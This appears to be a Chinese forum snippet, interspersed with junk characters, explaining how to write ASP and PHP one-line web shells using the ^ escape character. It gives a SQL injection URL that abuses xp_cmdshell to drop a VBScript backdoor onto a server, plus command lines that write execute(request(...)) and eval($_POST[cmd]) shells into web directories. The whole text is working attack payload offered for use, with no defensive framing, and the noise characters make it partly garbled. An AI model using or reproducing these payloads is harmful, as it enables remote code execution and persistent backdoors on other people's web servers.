用^转义字符来写ASP(一句话木马)文件的方法:
! g: I) m* x$ Y+ \5 v+ o) ~$ s" ^1 v3 v+ B- h# ?
1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--" e5 E Q0 W+ i
( T9 \; K' a0 o* A! B* L/ \
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
! J1 `' E; e( A+ ~: C
0 a/ T2 X9 U2 @! Q1 l
6 u1 q- Z) d. ^7 t2 g9 U$ ?5 _PHP$ R9 x b5 @1 p/ g
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |